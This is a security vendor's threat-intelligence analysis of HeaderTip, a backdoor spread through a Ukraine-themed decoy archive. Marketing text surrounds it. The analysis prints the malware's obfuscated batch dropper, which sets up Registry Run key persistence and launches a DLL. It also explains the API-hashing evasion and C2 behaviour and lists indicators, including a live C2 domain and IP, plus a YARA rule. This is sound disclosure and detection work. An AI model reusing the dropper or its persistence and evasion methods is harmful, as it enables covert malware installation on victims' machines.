Combine cutting-edge XDR technology, multi-signal threat intelligence and 24/7 Elite Threat Hunters to help you build a world-class security operation.
Our team delivers the fastest response time in the industry. Threat suppression within just 4 hours of being engaged.
Cyber risk and advisory programs that identify security gaps and build security strategies to address them.
24/7 SOC-as-a-Service with unlimited threat hunting and incident handling.
XDR with machine learning that eliminates noise, enables real-time detection and response, and automatically blocks threats.
Seamless integration and threat investigation across your existing tech stack.
Proactive threat intelligence, original threat research and a world-class team of seasoned industry veterans.
Extend your team capabilities and prevent business disruption with expertise from eSentire.
We balance automated blocks with rapid human-led investigations to manage threats.
Guard endpoints by isolating and remediating threats to prevent lateral spread.
Defend brute force attacks, active intrusions and unauthorized scans.
Investigation and threat detection across multi-cloud or hybrid environments.
Remediate misconfigurations, vulnerabilities and policy violations.
Investigate and respond to compromised identities and insider threats.
Stop ransomware before it spreads.
Meet regulatory compliance mandates.
Detect and respond to zero-day exploits.
End misconfigurations and policy violations.
Defend third-party and supply chain risk.
Prevent disruption by outsourcing MDR.
Adopt a risk-based security approach.
Meet insurability requirements with MDR.
Protect your most sensitive data.
Build a proven security program.
Operationalize timely, accurate, and actionable cyber threat intelligence.
THE THREAT In recent weeks, eSentire’s Threat Response Unit (TRU) has traced numerous email account compromise cases to infrastructure hosted on several related hosting…
Dec 10, 2024THE THREATUpdate: Security patches to address this vulnerability were released by Cleo on December 12th. Organizations need to update to Cleo Harmony, VLTrader, and LexiCom versions…
eSentire is The Authority in Managed Detection and Response Services, protecting the critical data and applications of 2000+ organizations in 80+ countries from known and unknown cyber threats. Founded in 2001, the company’s mission is to hunt, investigate and stop cyber threats before they become business disrupting events.
We provide sophisticated cybersecurity solutions for Managed Security Service Providers (MSSPs), Managed Service Providers (MSPs), and Value-Added Resellers (VARs). Find out why you should partner with eSentire, the Authority in Managed Detection and Response, today.
Multi-Signal MDR with 300+ technology integrations to support your existing investments.
24/7 SOC-as-a-Service with unlimited threat hunting and incident handling.
Three MDR package tiers are available based on per-user pricing and level of risk tolerance.
The latest security advisories, blogs, reports, industry publications and webinars published by TRU.
Compare eSentire to other Managed Detection and Response vendors to see how we stack up against the competition.
See why 2000+ organizations globally have chosen eSentire for their MDR Solution.
Since humans are still the weakest link in cybersecurity, threat actor(s) continue to prey on fallible human nature to launch cyberattacks. As the Russia-Ukraine conflict continues to impact the global economy and draw worldwide attention, these tensions create opportunities for threat actor(s) to designing campaigns to exploit human vulnerabilities and anxieties stemming from the Russia-Ukraine conflict.
HeaderTip is a malware used by threat actor(s) that are leveraging the current Russia-Ukraine conflict to spread persistent malware. eSentire Threat Intelligence assesses with high confidence that HeaderTip serves as a backdoor and a loader for threat actor(s) to further deploy rootkits, trojans, or other types of malware.
eSentire’s Threat Intelligence team has performed a technical malware analysis on HeaderTip. This technical analysis provides a breakdown of how HeaderTip achieves the persistence on the infected machine and how it obfuscates the code to evade detections.
On March 22, 2022, the Computer Emergency Response Team of Ukraine (CERT-UA) detected the RAR-archive translated as, “The preservation of video materials on criminal actions from Russian military” from a Ukrainian organization. The malware campaign is dubbed as HeaderTip and is being tracked as UAC-0026.
CERT-UA reported that they observed similar activity in September 2020. In addition, researchers at SentinelOne have tied the malware campaign to the suspected Chinese group of threat actors known as Scarab. The Scarab malware was first observed in 2012 targeting organizations in Russia, Ukraine, United States, Chile, and Syria.
The RAR archive contains an executable with the same naming convention as the archive. The executable has an embedded PDF file and is not signed. The 32-bit executable is written in C++ programming language with a file size of 653 KB.
An overview of the malicious files, domains and IPs related to HeaderTip (Exhibit 1).
The executable file contains the .RCData section with an embedded PDF file which is likely used as a bait. The PDF document contains information from the National Police of Ukraine with instructions on how to retain video evidence on criminal activities conducted by the Russian military in Ukraine so they can be used in investigations by the Criminal Investigative Division of Ukraine (Exhibits 2-3).
The metadata indicates that the PDF document was created on March 16, 2022, which is the exact date when the document was issued and signed. We assess with high confidence that the document was not forged. The document was written by a native Ukrainian speaker, based on grammatical accuracy and vocabulary.
The second resource contains the dropped .BAT file named “officecleaner.dat” with the following commands:
@echo off set objfile=%temp%\httpshelper.dll if not exist %objfile% ( echo | set /p="M%fgopvhrsdfertj%Z" > %objfile% type %temp%\officecleaner.dat >> %objfile% del %temp%\officecleaner.dat re%ooperoitlksdfgljjdfgijtrjg%g add HK%iwejhjkhkl%CU\Software\Microsoft\Windows\C%ljljlkwjefiofljksdfha%urrentVersion\Run /v "httpshelper" /d "c:\windows\system32\run%jlkjfaewiuoqrjljretfdsg%dll32.exe %objfile%,OAService" /f start c:\windows\system32\rundll32.exe %objfile%,OAService ) else ( set bat="bat" )
The command is responsible for dropping a malicious .DLL (Dynamic Link Library) file (officecleaner.dat) onto the %TEMP% folder, appends the MZ (the executable file format used for .EXE files in DOS header) to it and renames the officecleaner.dat file as httpshelper.dll. Additionally, the batch file sets up a persistence mechanism via Registry Run Keys. The officecleaner.dat file is removed from %TEMP% folder after successfully renaming itself (Exhibit 4).
The de-obfuscated command is used to add the Registry Run Key with the key name “OAService” to run the malicious httpshelper.dll file:
The third resource contains a .DLL file with a missing executable (MZ) header (Exhibit 5).
Upon analyzing the executable file in a disassembler, we found another value being added to the Registry Run Keys (Exhibit 6):
The added httpsrvlog key is responsible for running the officecleaner.bat file under the %TEMP% directory.
We have observed the following files being dropped onto the %TEMP% folder after the running the malicious executable:
The 32-bit .DLL file is written in C++ programming language. The size of the file is relatively small – 9.50 KB. Upon analyzing the file in a disassembler, we have noticed that the malware is hiding the API imports by applying the stackstrings and dynamically resolving APIs at runtime (Exhibit 7).
The malware hashes the libraries and API functions by applying ROR-13 calculation to evade detections. LoadLibraryA is used to load the Wininet library, which contains the functions that enables the application to interact with HTTP protocol in our malware sample. GetProcAddress API is used to resolve the function’s address. (Exhibit 8-9).
The malicious DLL initiates the connection to the C2 domain over port 8080, the function resides in export named OAService (Exhibit 10). The threat actor(s) is utilizing Dynamic DNS (DDNS) from ChangeIP with the hardcoded domain in the DLL sample, which means that the infected machines can connect to C2 servers using a domain name instead of IP address. This gives the threat actor(s) a huge benefit as they can change or not have to rely on IP addresses to avoid detection.
The main C2 communication function is shown in Exhibit 11. The malware creates a POST request handle, checks if the request is successfully received from the C2 server with HTTP response code 200, and reads 128 bytes of data received from C2 server by calling InternetReadFile API (Exhibit 12). It also uses the User-Agent string, Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko, for C2 communications.
We have also noticed a function containing a “Loader” string. We believe the function is responsible for loading the DLL into the memory by using VirtualAlloc API to allocate new memory regions inside the address space of a process (Exhibit 12). First, it compares if the file contains MZ header, then it loops through the first 4096 bytes of the DLL file (Exhibit 13).
Our Threat Response Unit (TRU) combines threat intelligence obtained from research, security incidents, and the external threat landscape to produce actionable outcomes for our customers. We are taking a holistic response approach to combat all malware by deploying countermeasures, such as:
Our detection content is supported by investigation runbooks, ensuring our SOC cyber analysts respond rapidly to any intrusion attempts. In addition, our Threat Response Unit closely monitors the threat landscape and addresses capability gaps and performs retroactive threat hunts to assess customer impact.
We recommend implementing the following controls to help secure your organization against HeaderTip malware:
While the Tactics, Techniques, and Procedures (TTPs) used by threat actor(s) grow in sophistication, they lead to a limited set of options at which critical business decisions must be made. Intercepting the various attack paths utilized by the modern threat actor requires actively monitoring the threat landscape, developing, and deploying endpoint detection, and the ability to investigate logs & network data during active intrusions.
eSentire’s Threat Response Unit (TRU) is a world-class team of threat researchers who develop new detections enriched by original threat intelligence and leverage new machine learning models that correlate multi-signal data and automate rapid response to advanced threats.
If you are not currently engaged with an MDR provider, eSentire MDR can help you reclaim the advantage and put your business ahead of disruption.
Learn what it means to have an elite team of Threat Hunters and Researchers that works for you. Connect with an eSentire Security Specialist.
Name | Indicators |
Про збереження відеоматеріалів з фіксацією злочинних дій армії російської федерації.rar | 839e968aa5a6691929b4d65a539c2261f4ecd1c504a8ba52abbfbac0774d6fa3 (SHA-256) |
Про збереження відеоматеріалів з фіксацією злочинних дій армії російської федерації.exe | 042271aadf2191749876fc99997d0e6bdd3b89159e7ab8cd11a9f13ae65fa6b1 (SHA-256) |
#2163_02_33-2022.pdf (decoy PDF) | C0962437a293b1e1c2702b98d935e929456ab841193da8b257bd4ab891bf9f69 (SHA-256) |
officecleaner.dat | a2ffd62a500abbd157e46f4caeb91217738297709362ca2c23b0c2d117c7df38 |
officecleaner.bat | 830c6ead1d972f0f41362f89a50f41d869e8c22ea95804003d2811c3a09c3160 |
httpshelper.dll | 63a218d3fc7c2f7fcadc0f6f907f326cc86eb3f8cf122704597454c34c141cf1 |
C2 Domain | product2020[.]mrbasic[.]com |
IP | 104.155.198[.]25 |
The Yara rule for the malicious DLL and the executable:
import "pe" import "math" rule HeaderTip { meta: author = "eSentire TI" date = "03/27/2022" version = "1.0" strings: $string = "%016I64x%08x" wide fullword nocase $user_agent = "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" wide fullword nocase $export = "OAService" $dll_name = "httpshelper.dll" $c2_domain = "product2020.mrbasic.com" wide fullword nocase condition: for any i in (0..pe.number_of_sections - 1): ( math.entropy(pe.sections[i].raw_data_offset, pe.sections[i].raw_data_size) >=6 and pe.sections[i].name == ".text") and all of them and (uint16(0) == 0x5A4D or uint32(0) == 0x4464c457f) }
The eSentire Threat Response Unit (TRU) is an industry-leading threat research team committed to helping your organization become more resilient. TRU is an elite team of threat hunters and researchers that supports our 24/7 Security Operations Centers (SOCs), builds threat detection models across the eSentire XDR Cloud Platform, and works as an extension of your security team to continuously improve our Managed Detection and Response service. By providing complete visibility across your attack surface and performing global threat sweeps and proactive hypothesis-driven threat hunts augmented by original threat research, we are laser-focused on defending your organization against known and unknown threats.